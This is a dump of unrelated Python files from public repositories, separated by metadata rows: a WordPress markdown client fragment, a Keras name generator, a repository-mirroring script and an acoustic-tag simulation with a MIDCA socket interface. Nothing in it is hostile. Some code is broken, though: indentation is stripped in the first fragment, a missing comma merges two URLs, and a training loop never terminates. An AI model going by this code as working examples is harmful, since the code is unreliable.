if n: post.categories.append(n)
for n in [ n.strip() for n in tags ]:
if n: post.tags.append(n)
post.id = post.metadata.get('id', None)
post.status = post.metadata.get('status', 'published').strip()
return post
def wordpress (self, options):
class Object (object): pass
opt = Object()
opt.attributes = []
opt.asciidoc_opts = []
opt.categories = ''
opt.doctype = None
opt.conf_file = None
opt.force = False
opt.force_media = False
opt.mandatory_parameters = ''
opt.media_dir = None
opt.media = True
opt.dry_run = False
opt.pages = False
opt.id = None
opt.proxy = None
opt.title = None
opt.status = None
opt.verbose = 0
opt.command = None
opt.filename = None
opt.status = 'published'
import xmlrpclib
for n in options:
opt.__dict__[n] = options[n]
try:
blogpost.OPTIONS = opt
blog = blogpost.Blogpost( \
self._wordpress.url, \
self._wordpress.username, \
self._wordpress.password, \
opt)
blog.set_blog_file(opt.filename)
blog.load_cache()
blog.get_parameters()
blog.check_mandatory_parameters()
blog.title = blog.parameters.get('title', blog.title)
if opt.title:
blog.title = opt.title
if opt.id is not None:
blog.id = opt.id
blog.post_type = blog.parameters.get('posttype', blog.post_type)
if blog.post_type is None:
blog.post_type = 'post'
blog.status = blog.parameters.get('status', blog.status)
if opt.status:
blog.status = opt.status
if blog.status is None:
blog.status = 'published'
blog.status = 'published'
blog.doctype = blog.parameters.get('doctype', blog.doctype)
if opt.doctype is not None:
blog.doctype = options.doctype
if blog.doctype is None:
blog.doctype = 'article' # default
opt.categories = blog.parameters.get('categories', opt.categories)
command = opt.command
if command == 'info':
blog.info()
elif command == 'categories':
if opt.categories:
blog.set_categories()
else:
blog.list_categories()
elif command == 'list':
blog.list()
elif command == 'delete':
if blog.id is None:
die('missing cache file: specify id please')
blog.delete()
elif command == 'dump':
blog.dump()
elif command in ('post', 'create', 'update'):
if blog.id is not None and command == 'create':
die('document has been previously posted, use update command')
if blog.id is None and command == 'update':
die('missing cache file: specify id instead')
if command == 'update' or \
command == 'post' and blog.id is not None:
blog.update()
if command == 'create' or \
command == 'post' and blog.id is None:
blog.create()
if opt.categories:
blog.set_categories()
else:
die('unknow command')
except xmlrpclib.ProtocolError, e:
die(e)
return 0
#----------------------------------------------------------------------
# wordpress
#----------------------------------------------------------------------
class wordpress (object):
def __init__ (self, home = '.'):
self.config = configure(home)
self.verbose = False
def info (self, message):
if self.verbose:
print message
return 0
def warn (self, message):
sys.stderr.write('%s\n'%message)
sys.stderr.flush()
def synchronize (self, name, force = False, verbose = False):
self.verbose = verbose
if os.path.splitext(name)[-1] != '.md':
self.warn('can not synchronize non markdown file')
return -1
if not name in self.config:
self.warn('missing doc/%s in %s'%(name, self.config._dirhome))
return -2
post = self.config[name]
if post.modified == False and force == False:
self.info('[skip: %s]'%name)
return 0
self.info('[synchronizing: %s]'%name)
self.config.markdown(post)
if not post.title:
self.warn('missing title in %s'%(name))
return -3
opt = {}
opt['title'] = post.title.encode('utf-8')
if post.id:
opt['title'] = post.id
if post.categories:
opt['categories'] = (','.join(post.categories)).encode('utf-8')
if post.tags:
opt['tags'] = (','.join(post.tags)).encode('utf-8')
opt['command'] = 'post'
self.info('writing: %s'%post.filename['html'])
fp = open(post.filename['html'], 'wb')
fp.write(post.html.encode('utf-8'))
fp.close()
opt['filename'] = post.filename['html']
opt['status'] = 'published'
opt['force'] = force
self.config.wordpress(opt)
self.info('')
return 0
#----------------------------------------------------------------------
# main
#----------------------------------------------------------------------
def main(args = None):
if args == None:
args = sys.argv
args = [ n for n in args ]
import optparse
description = 'A Wordpress command-line weblog client for markdown'
parser = optparse.OptionParser( \
usage='usage: %prog [OPTIONS] BLOG_FILE',
version='1.0.0',
description = description)
parser.add_option('--force', action='store_true', dest='force',
default = False, help = 'force blog file to upload')
OPTIONS, ARGS = parser.parse_args(args)
if len(ARGS) < 2:
print 'missing blog_file'
return -1
filename = ARGS[1]
print ARGS
wp = wordpress()
wp.synchronize(filename, OPTIONS.force, True)
return 0
#----------------------------------------------------------------------
# testing case
#----------------------------------------------------------------------
if __name__ == '__main__':
def test1():
config = configure('.')
print config.path('.')
print config
print config._wordpress.url
print config._wordpress.username
return 0
def test2():
wp = wordpress()
wp.synchronize('post.3.md', True, True)
return 0
#test2()
main()
| UTF-8 | Python | false | false | 10,294 | py | 3 | wordpress.py | 2 | 0.586847 | 0.582572 | 0.000583 | 362 | 27.428177 | 71 |
Frixoe/canadian-name-generator | 1,142,461,353,662 | 58e96b09f928ae70ab27c91ab52f0f78cee0c1ee | 6fb34a4996dd10d63abb92ca01a56126ecd73b61 | /main.py | b7b42e5519e30e443ef42966be76793dbc906c95 | [
"MIT"
] | permissive | https://github.com/Frixoe/canadian-name-generator | d2e70206fb2ebce4e359eaae1420fb7feff7ae03 | ee041639d4ea1209275a625b1f6ce6caf96bfa0f | refs/heads/master | "2021-06-05T13:49:26.442434" | "2018-09-11T11:13:34" | "2018-09-11T11:13:34" | 148,300,678 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
import numpy as np
import os
os.environ['KERAS_BACKEND'] = 'theano' # Using 'theano' backend for keras
import tensorflow as tf
import keras
from keras.models import Sequential, load_model
from keras.layers import Dense, LSTM, TimeDistributed, Activation
# Loading the data into a DataFrame
df = pd.read_csv("names.csv")
# Converting df column to list
names = list(df["name"][:])
names = [item.lower() for item in names]
#Creating vocab for Index to Char
itc = {key: value for key, value in enumerate(sorted(list(set("".join(names)))))}
itc[26] = "\n"
# Creating vocab for Char to Index
cti = {itc[key]: key for key in itc.keys()}
# Setting the maximum length of a name(CAN BE CHANGED)
max_len = 30
# Create a zeros array with necessary shape
data = np.zeros((len(names), max_len, len(itc.keys())))
# Fill the data array with correct encodings of the names
for i in range(data.shape[0]):
error = False
for j in range(data.shape[1]):
try:
data[i, j, cti[names[i][j]]] = 1
except IndexError:
data[i, j, cti["\n"]] = 1; error = True; break
if not error: data[i, data.shape[1] - 1, cti["\n"]] = 1
# Reassigning the data to training samples X and targets Y
X, Y = np.zeros(data.shape), np.zeros(data.shape)
X[:, :, :], Y[:, :Y.shape[1] - 1, :] = data[:, :, :], data[:, 1:, :]
# Splitting the Data into training and evaluation sets
split_to_and_from = 374000
X_train, Y_train, X_test, Y_test = (X[:split_to_and_from, :, :], Y[:split_to_and_from, :], X[split_to_and_from:, :, :], Y[split_to_and_from:, :])
##### CREATING THE MODEL
# Hyper - params
time_steps = max_len
b_size = 2000
n_cells = 30
l_r = 0.01
print("Creating model...")
global model
model = Sequential([
LSTM(n_cells, input_shape=(None, X.shape[2]), return_sequences=True),
TimeDistributed(Dense(len(cti), activation="softmax"))
])
print("Model created!")
# Compiling the model
model.compile("rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
def pred(length):
'''
Generate a name with the model.
'''
X_pred = np.zeros((1, length, len(cti)))
pred = [np.random.randint(len(cti) - 1)]
gen = [itc[pred[-1]]]
for i in range(length):
X_pred[0, i, :][pred[-1]] = 1
pred_arr = model.predict(X_pred[:, :, :], batch_size=1, verbose=0)
pred_arr = pred_arr[0, i, :]
p = np.argmax(pred_arr)
pred.append(p)
gen.append(itc[pred[-1]])
return "".join(gen)
def train_model(num_epochs):
print("Training the model now for {} epochs...".format(num_epochs))
current_e = 1
while current_e < num_epochs:
# Fitting the model
model.fit(x=X_train, y=Y_train, batch_size=b_size, epochs=1, verbose=1)
# Generate a name of max_len
print(pred(max_len).strip("\n"))
print("Training complete!")
def save_my_model():
# Saves weights and architecture
model.save("my_keras_model.h5")
# Training the model
train_model(10)
# Save model
save_my_model()
# Evaluating the model
metrics = model.evaluate(x=X_test, y=Y_test, batch_size=100)
print("Model metrics: ")
for m_name, m in zip(model.metrics_names, metrics):
print("{}: {}".format(m_name, m))
| UTF-8 | Python | false | false | 3,148 | py | 4 | main.py | 1 | 0.650572 | 0.635006 | 0 | 121 | 25.016529 | 145 |
MuggleWei/useful_scripts | 7,430,293,468,260 | 53737d148a06aba8152ed65e262075762deb6c7a | dd6ee0d198b200606247a9f98a6036a0556758cf | /essential_sources/essential_sources.py | 9967818ddf96e30e860ce2c30d403684fcd3970d | [] | no_license | https://github.com/MuggleWei/useful_scripts | 03407709900c3a5f40bc87b44430a07cfc6484f8 | 8a9ffa8318254b04ac1e0fc57bf3646f229d094c | refs/heads/master | "2023-07-25T04:44:09.168942" | "2023-07-22T17:39:12" | "2023-07-22T17:39:12" | 80,839,002 | 4 | 1 | null | false | "2023-05-23T02:11:50" | "2017-02-03T15:00:14" | "2022-12-14T22:40:39" | "2023-05-23T02:11:49" | 194 | 4 | 1 | 2 | Vim Script | false | false | """ 下载必备代码库 """
import os
import subprocess
def run_subprocess(args):
"""
运行子进程并实时输出
:param args: 执行的命令
"""
with subprocess.Popen(args, stdout=subprocess.PIPE) as p:
try:
for line in p.stdout:
if not line:
break
print("{}".format(line.decode("utf-8")))
except Exception as e:
print("{} failed: {}".format(args, e))
if __name__ == "__main__":
# 需要备份的代码库
source_list = [
# 自己的代码库
"https://github.com/MuggleWei/mugglec.git",
"https://github.com/MuggleWei/Hakuna_Matata.git",
"https://github.com/MuggleWei/useful_scripts.git",
"https://github.com/MuggleWei/mugglewei.github.io.git",
"https://github.com/MuggleWei/learning_compass.git",
"https://github.com/MuggleWei/babeltrader.git",
"https://github.com/MuggleWei/mugglecpp.git",
"https://github.com/MuggleWei/latency-benchmark.git",
"https://github.com/MuggleWei/callback_benchmark.git",
"https://github.com/MuggleWei/srclient.git",
"https://github.com/MuggleWei/webtoy.git",
"https://github.com/MuggleWei/goev.git",
"https://github.com/MuggleWei/hpb.git",
"https://github.com/MuggleWei/hpkg.git",
# 代码
"https://github.com/python/cpython.git",
"https://github.com/vim/vim.git",
"https://github.com/neovim/neovim.git",
"https://github.com/Kitware/CMake.git",
"https://github.com/wolfSSL/wolfssl.git",
"https://github.com/openssl/openssl.git",
"https://github.com/Mbed-TLS/mbedtls.git",
"https://github.com/gpg/gnupg.git",
"https://github.com/gpg/libgcrypt.git",
"https://github.com/gpg/libgpg-error.git",
"https://github.com/madler/zlib.git",
"https://github.com/facebook/zstd.git",
"https://github.com/mcmilk/7-Zip-zstd.git",
"https://github.com/the-tcpdump-group/libpcap.git",
"https://github.com/libevent/libevent.git",
"https://github.com/sqlite/sqlite.git",
"https://github.com/google/googletest.git",
"https://github.com/gperftools/gperftools.git"
"https://github.com/protocolbuffers/protobuf.git",
"https://github.com/gflags/gflags.git",
"https://github.com/danmar/cppcheck.git",
"https://github.com/leethomason/tinyxml2.git",
"https://github.com/Tencent/rapidjson.git",
"https://github.com/bkaradzic/bgfx.git",
"https://github.com/ocornut/imgui.git",
"https://github.com/ArthurSonzogni/FTXUI.git",
"https://github.com/tcltk/tcl.git", # 编译某些项目时需要此库
"https://github.com/openai/gpt-2.git",
# 学习/博客/例子
# "https://github.com/jiji262/wooyun_articles.git", # 2.5G 太占硬盘了 :(
"https://github.com/wolfSSL/wolfssl-examples.git",
# 日常生活
"https://github.com/shadowsocks/shadowsocks-libev.git",
"https://github.com/adityatelange/hugo-PaperMod.git",
"https://github.com/KaTeX/KaTeX.git",
"https://github.com/mdaines/viz.js.git",
]
# 当前工作目录下的目录
cur_dirs = os.listdir(".")
# 遍历清单, 获取状态
cur_dir = os.getcwd()
for src in source_list:
name = src.split("/")[-1][:-4]
if name in cur_dirs:
print("----------------------------------------------")
print("{}: already exists, git pull".format(name))
# 进入文件夹
os.chdir(name)
# 运行git pull
args = ["git", "pull"]
run_subprocess(args=args)
# 返回原目录
os.chdir(cur_dir)
else:
print("----------------------------------------------")
print("{}: clone".format(name))
# 运行git pull
args = ["git", "clone", src]
run_subprocess(args=args)
| UTF-8 | Python | false | false | 4,057 | py | 104 | essential_sources.py | 51 | 0.557827 | 0.554981 | 0 | 106 | 35.462264 | 75 |
ybdesire/pylearn | 12,756,052,903,444 | 3799b6d8c702a86451e2db0148370e6b36f7ebb3 | 90a1aa497ec53fa87bc31cd5101ad55adb22cddb | /exception/ex_print_error_line.py | 8dfedad23a2fd5208efc49bf1ee5ca929dd1a387 | [] | no_license | https://github.com/ybdesire/pylearn | 39821e3e5cb61c021afc7af2052e0de7077961e2 | 400e525c0529bea6da74aab9bc86fe5e26549d32 | refs/heads/master | "2023-02-04T02:08:44.352846" | "2023-01-28T09:28:34" | "2023-01-28T09:28:34" | 79,337,563 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
try:
x = 1+1
y = x/0
z = 2+2
except Exception as e:
s = sys.exc_info()
print('exception error msg : {0}'.format(s[1]))
print('exception on line: {0} '.format(s[2].tb_lineno)) | UTF-8 | Python | false | false | 223 | py | 228 | ex_print_error_line.py | 172 | 0.529148 | 0.488789 | 0 | 12 | 16.75 | 59 |
COLAB2/tagsim | 6,949,257,121,157 | 7ae49a43e3d16721de29163afe38e6daa68b5cd9 | 468f88552212e17cec428437d119b824e5660943 | /fieldComparisonMidca.py | 15fcdd3427847381884a2ef77eca5f01e3e5dff3 | [] | no_license | https://github.com/COLAB2/tagsim | c3efb6b4715163b53cfe3328880fd77ffc466722 | 9d4c040a7c842cb14c0075b423345db209e51958 | refs/heads/master | "2022-12-29T02:34:19.339669" | "2020-10-15T14:17:13" | "2020-10-15T14:17:13" | 281,707,413 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import time
import matplotlib.pyplot as plt
from gridworld import Grid
import gridworld
from AcousticTag import AcousticTag
from Agent import Agent
from AcousticReciever import AcousticReciever
import socket
import threading
import traceback
import sys
wp_list = None
allDetectionData = None
allMeasurementData = []
t = 0
endSim = False
def find_max_5_values_avg(time):
a = {}
for each in time:
if each in a:
a[each] += 1
else:
a[each] = 1
values = a.values()
#print ("best 5 values: ")
if values:
values.sort(reverse=True)
#print (values[:5])
#print (sum(values[:5]))
return float(sum(values[:7])) / 7
else:
return 0
def find_max_7_values_avg_measurement(time, data):
a = {}
for index, each in enumerate(time):
if each in a:
a[each] += data[index]
else:
a[each] = data[index]
values = a.values()
#print ("best 5 values: ")
if values:
values.sort(reverse=True)
#print (values[:5])
#print (sum(values[:5]))
return float(sum(values[:5])) / 5
else:
return 0
def MidcaComLink():
global running, searchComplete, wp_list, agent, E, det_count, agentList
run = True
# create an INET, STREAMing socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind the socket to a public host, and a well-known port
sock.bind(('127.0.0.1', 5700))
sock.listen(5)
# accept connections from outside
(clientsocket, address) = sock.accept()
# now do something with the clientsocket
print("starting")
while run:
try:
clientsocket, address = sock.accept()
data = clientsocket.recv(1024)
data = data.decode('utf-8')
cmd = data.split(',')
#print(cmd)
if cmd[0] == 'quit':
running = False
run = False
endSim = True
if cmd[0] == 'start':
running = True
if cmd[0] == 'moveTo':
x = int(cmd[1]) - 1
y = int(cmd[2]) - 1
center = np.array([x * x_range/5.0, y * y_range/5.0]) + np.array([.5*x_range/5.0, .5*y_range/5.0])
wp_list[0] = [center]
if cmd[0] == 'moveToPhysicalPosition':
x=int(cmd[1])-1
y=int(cmd[2])-1
center=np.array([x,y])
wp_list[0]=[center]
if cmd[0] == 'inCell':
agent = agentList[0]
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
x = int(cmd[1])
y = int(cmd[2])
myx, myy = E.getCellXY(pos[0], pos[1])
bin2 = 5 * (y - 1) + (x - 1)
clientsocket.send(str.encode(str(x == myx and y == myy)))
#print(bin, bin2)
if cmd[0] == 'time':
clientsocket.send(str.encode(str(t)))
if cmd[0] == 'getCell':
agent = agentList[0]
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
myx, myy = E.getCellXY(pos[0], pos[1])
clientsocket.send(str.encode(str(myx) + "," + str(myy)))
if cmd[0] == 'search':
x = int(cmd[1]) - 1
y = int(cmd[2]) - 1
center = np.array([x * x_range/5.0, y * y_range/5.0]) + np.array([.5*x_range/5.0, .5*y_range/5.0])
wp_list[0] = search(wp_list[0], center)
searchComplete = False
if cmd[0] == 'searchComplete':
clientsocket.send(str.encode(str(searchComplete)))
if cmd[0] == 'get_tags':
agent = agentList[0]
bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1]))
#print (bin)
count = 0
unique = []
for data in allDetectionData:
if (data[3] == bin) and (not data[0] in unique):
count = count + 1
unique.append(data[0])
clientsocket.send(str.encode(str(count)))
if cmd[0] == 'get_measurement':
#allMeasurementData.append([latestMeas, [pos[0], pos[1]], bin])
# latestMeas, [pos0, pos1], bin
bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1])) - 1
print (bin)
sum = 0
unique = []
for data in allMeasurementData:
if (data[3] == bin) and (not data[2] in unique):
sum += data[0]
unique.append(data[2])
clientsocket.send(str.encode(str(sum)))
if cmd[0] == "get_adjacent_measurement":
agent = agentList[0]
factor = 2
xll = (int(cmd[1]) - 1) * factor * 2
yll = (int(cmd[2]) - 1) * factor * 2
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1]) - 1
unique = []
count = [0, 0, 0, 0]
time = [[], [], [], []]
measured_data = [[], [], [], []]
total_count = 0
for data in allMeasurementData: # tag ID,time,agent pos,bin
if (data[3] == bin) and (not data[2] in unique):
#print (data)
total_count += 1
unique.append(data[2])
# north
if data[2][1] > (yll + (factor * 1.50)):
count[0] += data[0]
measured_data[0].append(data[0])
time[0].append(data[1])
# print ("north")
# south
if data[2][1] < (yll + (factor *.50)):
count[1] += data[0]
measured_data[1].append(data[0])
time[1].append(data[1])
# print ("south")
# east
if data[2][0] > (xll + (factor *1.50)):
count[2] += data[0]
measured_data[2].append(data[0])
time[2].append(data[1])
# print ("east")
# west
if data[2][0] < (xll + (factor *.50)):
count[3] += data[0]
measured_data[3].append(data[0])
time[3].append(data[1])
# print ("west")
#print ("time: ")
#print (time)
#print ("Measured_data : ")
#print (measured_data)
result = []
# north
avg_rate = find_max_7_values_avg_measurement(time[0], measured_data[0])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
# south
avg_rate = find_max_7_values_avg_measurement(time[1], measured_data[1])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
# east
avg_rate = find_max_7_values_avg_measurement(time[2], measured_data[2])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
# west
avg_rate = find_max_7_values_avg_measurement(time[3], measured_data[3])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
data_to_be_sent = ",".join(str(i) for i in result)
clientsocket.send(str.encode(data_to_be_sent))
if cmd[0] == 'get_tags_adjacent':
agent = agentList[0]
factor = 2
xll = (int(cmd[1]) - 1) * factor * 2
yll = (int(cmd[2]) - 1) * factor * 2
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
probability = []
unique = []
count = [0, 0, 0, 0]
time = [[], [], [], []]
total_count = 0
for data in allDetectionData:#tag ID,time,agent pos,bin
if (data[3] == bin) and (not data[0] in unique):
total_count += 1
unique.append(data[0])
# north
if data[2][1] > (yll + (factor * 1.50)):
count[0] += 1
time[0].append(data[1])
# print ("north")
# south
if data[2][1] < (yll + (factor * .50)):
count[1] += 1
time[1].append(data[1])
# print ("south")
# east
if data[2][0] > (xll + (factor * 1.50)):
count[2] += 1
time[2].append(data[1])
# print ("east")
# west
if data[2][0] < (xll + (factor * .50)):
count[3] += 1
time[3].append(data[1])
# print ("west")
print (time)
print (count)
result = []
# north
avg_rate = find_max_5_values_avg(time[0])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
# south
avg_rate = find_max_5_values_avg(time[1])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
# east
avg_rate = find_max_5_values_avg(time[2])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
# west
avg_rate = find_max_5_values_avg(time[3])
#print ("Average value")
#print (avg_rate)
result.append(avg_rate)
data_to_be_sent = ",".join(str(i) for i in result)
#print ("The data is : ")
#print (data_to_be_sent)
clientsocket.send(str.encode(data_to_be_sent))
"""
#south
avg_rate = find_max_5_values_avg(time[1])
result.append(poisson_rate(avg_rate, 0.8))
#east
avg_rate = find_max_5_values_avg(time[2])
result.append(poisson_rate(avg_rate, 0.8))
#west
avg_rate = find_max_5_values_avg(time[3])
result.append(poisson_rate(avg_rate, 0.8))
data_to_be_sent = ",".join(str(result))
clientsocket.send(str.encode(data_to_be_sent))
# calculate time
for i,each in enumerate(time):
each.sort()
counted_times = sum([times-each[0] for times in each])
time[i] = counted_times
print (time)
print (count)
result = []
# calculate poison for north
if time[0] and count[0]:
rate = count[0]/time[0]
p = math.exp(-rate)
for i in xrange(total_count):
p *= rate
p /= i + 1
result.append(p)
else:
result.append(0.0)
# calculate poison for south
if time[1] and count[1]:
rate = count[1]/time[1]
p = math.exp(-rate)
for i in xrange(total_count):
p *= rate
p /= i + 1
result.append(p)
else:
result.append(0.0)
# calculate poison for east
if time[2] and count[2]:
rate = count[2]/time[2]
p = math.exp(-rate)
for i in xrange(total_count):
p *= rate
p /= i + 1
result.append(p)
else:
result.append(0.0)
# calculate poison for west
if time[3] and count[3]:
rate = count[3]/time[3]
p = math.exp(-rate)
for i in xrange(total_count):
p *= rate
p /= i + 1
result.append(p)
else:
result.append(0.0)
print (result)
data_to_be_sent = ",".join(str(result))
clientsocket.send(str.encode(data_to_be_sent))
"""
if cmd[0] == 'get_tags_adjacent_new':
agent = agentList[0]
factor = 2
xll = (int(cmd[1]) - 1) * factor * 2
yll = (int(cmd[2]) - 1) * factor * 2
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
probability = []
unique = []
count = [0, 0, 0, 0]
time = [[], [], [], []]
total_count = 0
for data in allDetectionData: # tag ID,time,agent pos,bin
if (data[3] == bin) and (not data[0] in unique):
total_count += 1
unique.append(data[0])
# north
if data[2][1] > (yll + (factor * 1.50)):
count[0] += 1
time[0].append(data[1])
# print ("north")
# south
if data[2][1] < (yll + (factor * .50)):
count[1] += 1
time[1].append(data[1])
# print ("south")
# east
if data[2][0] > (xll + (factor * 1.50)):
count[2] += 1
time[2].append(data[1])
# print ("east")
# west
if data[2][0] < (xll + (factor * .50)):
count[3] += 1
time[3].append(data[1])
# print ("west")
print (count)
data_to_be_sent = ",".join(str(i) for i in count)
# print ("The data is : ")
# print (data_to_be_sent)
clientsocket.send(str.encode(data_to_be_sent))
if cmd[0] == 'cell_lambda':
agent = agentList[0]
if len(cmd) < 2:
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1]) - 1
clientsocket.send(str.encode(str(agent.belief_map[bin])))
else:
#bin = E.getAbstractPos(int(cmd[1]), int(cmd[2])) - 1
bin = 5 * (int(cmd[1]) - 1) + (int(cmd[2])) - 1
clientsocket.send(str.encode(str(agent.belief_map[bin])))
det_count[0] = 0
clientsocket.close()#syncVar=True
except Exception as e:
traceback.print_exc()
print(e)
print("ending")
clientsocket.close()
def ErgodicComLink():
global u, run, updateGP,t
run=True
sock.send(str.encode(str(x_range)))
while run:
agent=agentList[0]
st=agent.state
bin=E.getAbstractPos(st[0],st[1])-1
try:
if not updateGP:
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+"None "))
else:
updateGP=False
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+str(latestMeas)))
except:
run=False
t=simtime
data = sock.recv(1024)
data = data.decode('utf-8')
cmd=data.split(',')
if len(cmd)>1:
u=(float(cmd[0]),float(cmd[1]))
if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
_,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
#print(st,u)
print(t,round(st[0],1),round(st[1],1),round(st[2],3),round(st[3],3),u)
syncVar=True
def ErgodicComLink2():
global u, run, updateGP,t
run=True
sock.send(str.encode(str(x_range)))
while run:
syncVar=False
agent=agentList[0]
st=agent.state
bin=E.getAbstractPos(st[0],st[1])-1
try:
if not updateGP:
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+"None "))
else:
updateGP=False
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+str(latestMeas)))
except:
run=False
t=simtime
data = sock.recv(1024)
data = data.decode('utf-8')
cmd=data.split(',')
if len(cmd)>1:
u=(float(cmd[0]),float(cmd[1]))
if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
_,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
#print(st,u)
print(t,round(st[0],1),round(st[1],1),u)
def doubleIntegratorErgodicControl(agent,update):
global run,t
st=agent.state
try:
if not update:
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+"None "))
else:
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(st[2])+" "+str(st[3])+" "+str(t)+" "+str(latestMeas)))
except:
run=False
t=simtime
return
data = sock.recv(1024)
data = data.decode('utf-8')
cmd=data.split(',')
if len(cmd)>1:
u=(float(cmd[0]),float(cmd[1]))
if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
_,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
return u
def singleIntegratorErgodicControl(agent,update):
global run,t
st=agent.state
try:
if not update:
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+"None "))
else:
sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+str(latestMeas)))
except:
run=False
t=simtime
return
data = sock.recv(1024)
data = data.decode('utf-8')
cmd=data.split(',')
if len(cmd)>1:
u=(float(cmd[0]),float(cmd[1]))
if st[0]>x_range or st[0]<0 or st[1]<0 or st[1]>y_range:
_,utemp=wp_track(agent.getPos(),np.array([x_range/2,y_range/2]))
u=np.clip(np.array([np.cos(utemp), np.sin(utemp)]),-0.1,0.1)
return u
def MidcaIntegrator(agent,update):
global running, searchComplete, wp_list, E, det_count, agentList, run, t
run = True
st= agent.state
try:
if not update:
#sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+"None "))
pass
else:
pass
#sock.send(str.encode(str(round(st[0],1)/x_range)+" "+str(round(st[1],1)/x_range)+" "+str(t)+" "+str(latestMeas)))
except:
run=False
t=simtime
return
# accept connections from outside
(clientsocket, address) = sock.accept()
data = clientsocket.recv(1024)
data = data.decode('utf-8')
cmd=data.split(',')
#print(cmd)
if cmd[0] == 'quit':
running = False
run = False
endSim = True
elif cmd[0] == 'start':
running = True
elif cmd[0] == 'moveTo':
x = int(cmd[1]) - 1
y = int(cmd[2]) - 1
center = np.array([x * x_range / 5.0, y * y_range / 5.0]) + np.array(
[.5 * x_range / 5.0, .5 * y_range / 5.0])
wp_list[0] = [center]
elif cmd[0] == 'moveToPhysicalPosition':
x = int(cmd[1]) - 1
y = int(cmd[2]) - 1
center = np.array([x, y])
wp_list[0] = [center]
elif cmd[0] == 'inCell':
agent = agentList[0]
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
x = int(cmd[1])
y = int(cmd[2])
myx, myy = E.getCellXY(pos[0], pos[1])
bin2 = 5 * (y - 1) + (x - 1)
clientsocket.send(str.encode(str(x == myx and y == myy)))
# print(bin, bin2)
elif cmd[0] == 'time':
clientsocket.send(str.encode(str(t)))
elif cmd[0] == 'getCell':
agent = agentList[0]
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1])
myx, myy = E.getCellXY(pos[0], pos[1])
clientsocket.send(str.encode(str(myx) + "," + str(myy)))
elif cmd[0] == 'search':
x = int(cmd[1]) - 1
y = int(cmd[2]) - 1
center = np.array([x * x_range / 5.0, y * y_range / 5.0]) + np.array(
[.5 * x_range / 5.0, .5 * y_range / 5.0])
wp_list[0] = search(wp_list[0], center)
searchComplete = False
elif cmd[0] == 'searchComplete':
clientsocket.send(str.encode(str(searchComplete)))
elif cmd[0] == 'get_tags':
agent = agentList[0]
bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1]))
# print (bin)
count = 0
unique = []
for data in allDetectionData:
if (data[3] == bin) and (not data[0] in unique):
count = count + 1
unique.append(data[0])
clientsocket.send(str.encode(str(count)))
elif cmd[0] == 'get_measurement':
# allMeasurementData.append([latestMeas, [pos[0], pos[1]], bin])
# latestMeas, [pos0, pos1], bin
bin = 5 * (int(cmd[2]) - 1) + (int(cmd[1])) - 1
print (bin)
sum = 0
unique = []
for data in allMeasurementData:
if (data[3] == bin) and (not data[2] in unique):
sum += data[0]
unique.append(data[2])
clientsocket.send(str.encode(str(sum)))
elif cmd[0] == "get_adjacent_measurement":
agent = agentList[0]
factor = 2
xll = (int(cmd[1]) - 1) * factor * 2
yll = (int(cmd[2]) - 1) * factor * 2
pos = agent.getPos()
bin = E.getAbstractPos(pos[0], pos[1]) - 1
unique = []
count = [0, 0, 0, 0]
time = [[], [], [], []]
measured_data = [[], [], [], []]
total_count = 0
for data in allMeasurementData: # tag ID,time,agent pos,bin
if (data[3] == bin) and (not data[2] in unique):
# print (data)
total_count += 1
unique.append(data[2])
# north
if data[2][1] > (yll + (factor * 1.50)):
count[0] += data[0]
measured_data[0].append(data[0])
time[0].append(data[1])
# print ("north")
# south
if data[2][1] < (yll + (factor * .50)):
count[1] += data[0]
measured_data[1].append(data[0])
time[1].append(data[1])
# print ("south")
# east
